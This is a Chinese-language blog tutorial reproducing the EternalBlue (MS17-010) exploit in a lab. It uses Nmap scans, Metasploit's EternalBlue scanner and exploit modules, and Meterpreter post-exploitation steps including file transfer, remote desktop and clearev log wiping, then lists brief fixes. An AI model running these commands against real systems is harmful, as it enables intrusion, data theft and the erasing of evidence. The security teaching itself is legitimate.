MS17-010 永恒之蓝漏洞利用方式

Eternal blue永恒之蓝漏洞

windows操作系统漏洞

借助工具Metasploit复现漏洞

利用条件:

1.目标计算机开启445端口

2.一般适用计算机系统 windows7 或windows server2008 R2

攻击机器:kali-Linux  192.168.109.130

目标靶机:windows7  192.168.109.129

1.在黑客机器中对目标计算机进行端口的扫描  发现目标445端口处于开放状态

nmap -p 80,3389,3306,445,8080 192.168.109.129

也可以考虑使用namp自带的script功能直接去扫描漏洞

nmap --script=vuln 192.168.109.129

发现同样可以利用ms17010永恒之蓝漏洞

接下来在kali端进行操作:

msfconsole
search ms17-010

接下来首先使用的是永恒之蓝扫描模块

use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 192.168.109.129

exploit

接下来使用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue
show options

set RHOSTS 192.168.109.129
exploit

msf有一些后渗透模块可以使用

捕获屏幕

meterpreter > screenshot

上传/下载文件

meterpreter > upload hello.txt c://
meterpreter > download d://1.txt

远程桌面

meterpreter > run vnc

使用rdesktop命令远程桌面

root@kali:~# rdesktop 192.168.2.6

清除日志

meterpreter > clearev

修复方案:

1.关闭445端口

2.打开防火墙 安装安全软件

3.安装相应的补丁

  • 5
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值